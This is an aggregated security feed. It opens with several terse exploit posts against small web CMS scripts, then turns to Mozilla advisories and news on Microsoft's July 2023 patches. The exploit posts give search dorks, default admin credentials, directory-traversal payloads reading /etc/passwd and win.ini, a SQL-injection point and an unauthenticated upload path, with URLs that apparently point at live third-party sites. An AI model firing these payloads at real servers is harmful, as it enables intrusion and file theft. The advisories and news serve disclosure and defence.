Avidi Media version 2.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Avidi Media v2.0 - Ultimate Video, Music, Photo and Gif Sharing Script - nulled Insecure Settings Vulnerability    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/avidi-media-advanced-images-and-media-sharing-script/21944719                          |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : Login    : admin                  Password : admin123[+] http://127.0.0.1/mobimallaz/profile,admin====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Avidi Media 2.0 Insecure Settings

AtTestimonials CMS version 1.2 suffers from a missing authentication vulnerability.

    ====================================================================================================================================| # Title     : AtTestimonials CMS v1.2 Missing Authentication Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip                                       || # Dork      : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to be missing authentication on the administrative interface[+] Use payload : /addnew.php[+] Add New Testimonials[+] http://wccpavingcouk/testimonials/addnew.php[+] Attach any file extension[+]  http://dfwcarfixcom/testimonials/upload/084145ahmad.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AtTestimonials CMS 1.2 Missing Authentication

Atom CMS version 2.0 suffers from a directory traversal vulnerability.

====================================================================================================================================  
| # Title     : AtomCMS 2.0 Directory traversal Vulnerability                                                                      |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |  
| # Vendor    : https://github.com/thedigicraft/atomCMS/                                                                           |    
| # Dork      : Welcome to AtomCMS 2.0                                                                                             |  
====================================================================================================================================

poc :

[+]  Dorking İn Google Or Other Search Enggine .

[+]  Directory traversal :

     Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's  
   root directory.

   [+]  Affected items :

    /Atom/admin/   
    /Atom/admin/index.php 

  [+]  The impact of this vulnerability :

      By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories.  
    As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.

[+]  How to fix this vulnerability :

     Your script should filter metacharacters from user input.

     Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.  
     This vulnerability affects /Atom/admin/. 

[+]  Attack details :

     URL encoded GET input page was set to unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\  
     File contents found:   
     ; for 16-bit app support

[+]  http://localhost/Atom/admin/?page=unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Atom CMS 2.0 Directory Traversal

Nedal CMS version 1.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Nedal CMS 1.2 Sql injection vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.sanapix.com/                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : link.asp?id=6 [+]  http://target_site/new/banner/link.asp?id=6 (inject her)====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Nedal CMS 1.2 SQL Injection

Asanhamayesh CMS version 3.4.6 suffers from a directory traversal vulnerability.

    =================================================================================================| # Title     : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability                        || # Author    : indoushka                                                                       || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)         || # Dork      : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6     |=================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd[+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Asanhamayesh CMS 3.4.6 Directory Traversal

The session restore helper crashed whenever there was no parameter sent to the message handler. This vulnerability affects Firefox for iOS < 115.

**Mozilla Foundation Security Advisory 2023-25**

Announced

July 4, 2023

Impact

moderate

Products

Firefox for iOS

Fixed in

*   Firefox for iOS 115

**#CVE-2023-37455: Media permission request prompt showing from background tab**

Reporter

Kazuki Nomoto

Impact

moderate

**Description**

The permission request prompt from the site in the background tab was overlaid on top of the site in the foreground tab.

**References**

*   Bug 1786934

**#CVE-2023-37456: Browser crashed when session restore was called with an empty body**

Reporter

Artem Chaykin

Impact

low

**Description**

The session restore helper crashed whenever there was no parameter sent to the message handler.

**References**

*   Bug 1795496

CVE-2023-37456: Security Vulnerabilities fixed in Firefox for iOS 115

During the worker lifecycle, a use-after-free condition could have occured, which could have led to a potentially exploitable crash. This vulnerability affects Firefox < 115.0.2 and Firefox ESR < 115.0.2.

**Mozilla Foundation Security Advisory 2023-26**

Announced

July 11, 2023

Impact

high

Products

Firefox, Firefox ESR

Fixed in

*   Firefox 115.0.2
*   Firefox ESR 115.0.2

**#CVE-2023-3600: Use-after-free in workers**

Reporter

Andrew McCreight

Impact

high

**Description**

During the worker lifecycle, a use-after-free condition could have occured, which could have led to a potentially exploitable crash.

**References**

*   Bug 1839703

CVE-2023-3600: Security Vulnerabilities fixed in Firefox 115.0.2 and Firefox ESR 115.0.2

Microsoft on Tuesday released updates to address a total of 130 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild.
Of the 130 vulnerabilities, nine are rated Critical and 121 are rated Important in severity. This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of

Vulnerability / Software Security

Microsoft on Tuesday released updates to address a total of 130 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild.

Of the 130 vulnerabilities, nine are rated Critical and 121 are rated Important in severity. This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of last month.

The list of issues that have come under active exploitation is as follows -

*   **CVE-2023-32046** (CVSS score: 7.8) - Windows MSHTML Platform Elevation of Privilege Vulnerability
*   **CVE-2023-32049** (CVSS score: 8.8) - Windows SmartScreen Security Feature Bypass Vulnerability
*   **CVE-2023-35311** (CVSS score: 8.8) - Microsoft Outlook Security Feature Bypass Vulnerability
*   **CVE-2023-36874** (CVSS score: 7.8) - Windows Error Reporting Service Elevation of Privilege Vulnerability
*   **CVE-2023-36884** (CVSS score: 8.3) - Office and Windows HTML Remote Code Execution Vulnerability (Also publicly known at the time of the release)
*   **ADV230001** - Malicious use of Microsoft-signed drivers for post-exploitation activity (no CVE assigned)

The Windows makers said it's aware of targeted attacks against defense and government entities in Europe and North America that attempt to exploit CVE-2023-36884 by using specially-crafted Microsoft Office document lures related to the Ukrainian World Congress, echoing the latest findings from BlackBerry.

"An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim," Microsoft said. "However, an attacker would have to convince the victim to open the malicious file."

The company has flagged the intrusion campaign to a Russian cybercriminal group it tracks as Storm-0978, which is also known by the names RomCom, Tropical Scorpius, UNC2596, and Void Rabisu.

"The actor also deploys the Underground ransomware, which is closely related to the Industrial Spy ransomware first observed in the wild in May 2022," the Microsoft Threat Intelligence team explained. "The actor's latest campaign detected in June 2023 involved abuse of CVE-2023-36884 to deliver a backdoor with similarities to RomCom."

Recent phishing attacks staged by the actor have entailed the use of trojanized versions of legitimate software hosted on lookalike websites to deploy a remote access trojan called RomCom RAT against various Ukrainian and pro-Ukraine targets in Eastern Europe and North America.

While RomCom was first clocked as a group tied to Cuba ransomware, it has since been linked to other ransomware strains such as Industrial Spy as well a new variant called Underground as of July 2023, which exhibits significant source code overlaps with Industry Spy.

Microsoft said it intends to take "appropriate action to help protect our customers" in the form of an out-of-band security update or via its monthly release process. In the absence of a patch for CVE-2023-36884, the company is urging users to use the "Block all Office applications from creating child processes" attack surface reduction (ASR) rule.

Redmond further said it revoked code-signing certificates used to sign and install malicious kernel-mode drivers on compromised systems by exploiting a Windows policy loophole to alter the signing date of drivers before July 29, 2015, by making use of open-source tools like HookSignTool and FuckCertVerifyTimeValidity.

The findings suggest that the use of rogue kernel-mode drivers is gaining traction among threat actors as they operate at the highest privilege level on Windows, thereby making it possible to establish persistence for extended periods of time while simultaneously interfering with the functioning of security software to evade detection.

UPCOMING WEBINAR

🔐 PAM Security – Expert Solutions to Secure Your Sensitive Accounts

This expert-led webinar will equip you with the knowledge and strategies you need to transform your privileged access security strategy.

Reserve Your Spot

It's not currently not clear how the other flaws are being exploited and how broadly those attacks are spread. But in light of active abuse, it's recommended that users move quickly to apply the updates to mitigate potential threats.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Apple (it has since been pulled)
*   Aruba Networks
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Progress MOVEit Transfer
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Synology
*   VMware
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Patches for 130 Vulnerabilities, Including 6 Under Active Attack

Categories: Exploits and vulnerabilities
Categories: News
Tags: Microsoft

Tags:  Adobe

Tags:  Apple

Tags:  Android

Tags:  Cisco

Tags:  Fortinet

Tags:  MOVEit

Tags:  Mozilla

Tags:  SAP

Tags:  VMware

Tags:  CVE-2023-32049

Tags:  CVE-2023-35311

Tags:  CVE-2023-32046

Tags:  CVE-2023-36874

Tags:  CVE-2023-36844

For the July 2023 Patch Tuesday, Microsoft has issued security updates for 130 vulnerabilities, four of which are known to have been actively exploited.



(Read more...)




The post Update now! Microsoft patches a whopping 130 vulnerabilities appeared first on Malwarebytes Labs.

It’s that time of the month again. For the July 2023 Patch Tuesday, Microsoft has issued security updates for 130 vulnerabilities. Nine of the vulnerabilities are rated as critical and four of them are known to be actively exploited.

The Cybersecurity & Infrastructure Security Agency (CISA) has already added these four vulnerabilities to the catalog of known to be exploited vulnerabilities.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The actively exploited vulnerabilities are listed as:

CVE-2023-32049 (CVSS score 8.8 out of 10): a Windows SmartScreen Security Feature Bypass vulnerability. The user would have to click on a specially crafted URL to be compromised by the attacker in which case the attacker would be able to bypass the Open File - Security Warning prompt.

CVE-2023-35311 (CVSS score 8.8 out of 10): a Microsoft Outlook Security Feature Bypass vulnerability. The user would have to click on a specially crafted URL to be compromised by the attacker in which case the attacker would be able to bypass the Microsoft Outlook Security Notice prompt. The Preview Pane is an attack vector, but additional user interaction is required.

CVE-2023-32046 (CVSS score 7.8 out of 10): a Windows MSHTML Platform Elevation of Privilege (EoP) vulnerability. Exploitation of the vulnerability requires that a user open a specially crafted file. An attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file in which case the attacker would gain the rights of the user that is running the affected application.

CVE-2023-36874 (CVSS score 7.8.out of 10): a Windows Error Reporting Service Elevation of Privilege vulnerability. An attacker who successfully exploited this vulnerability could gain administrator privileges but the attacker must have local access to the targeted machine and the user must be able to create folders and performance traces on the machine, with restricted privileges that normal users have by default.

The CVE below is under investigation and we will tell you more about it in a separate blogpost.

CVE-2023-36884 (CVSS score 8.3 out of 10): an Office and Windows HTML Remote Code Execution (RCE) vulnerability. An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

Additionally, Microsoft issued an advisory titled Guidance on Microsoft Signed Drivers Being Used Maliciously. The advisory warns about drivers certified by Microsoft’s Windows Hardware Developer Program (MWHDP) which were being used maliciously in post-exploitation activity. In these attacks, the attacker gained administrative privileges on compromised systems before using the drivers. As a result of a Microsoft investigation, the partners' seller accounts were suspended and detections for all the reported malicious drivers were added. Whether this really solves the problem of digitally signed malicious drivers is doubtful since there are publicly available tools to sign drivers.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities affecting ColdFusion and InDesign. 

**Apple** has issued an RSR update for a vulnerability which it says may have been actively exploited.

**Cisco** has released security updates for several products.

**Fortinet** has released a security update to address a critical vulnerability (CVE-2023-33308) affecting FortiOS and FortiProxy.

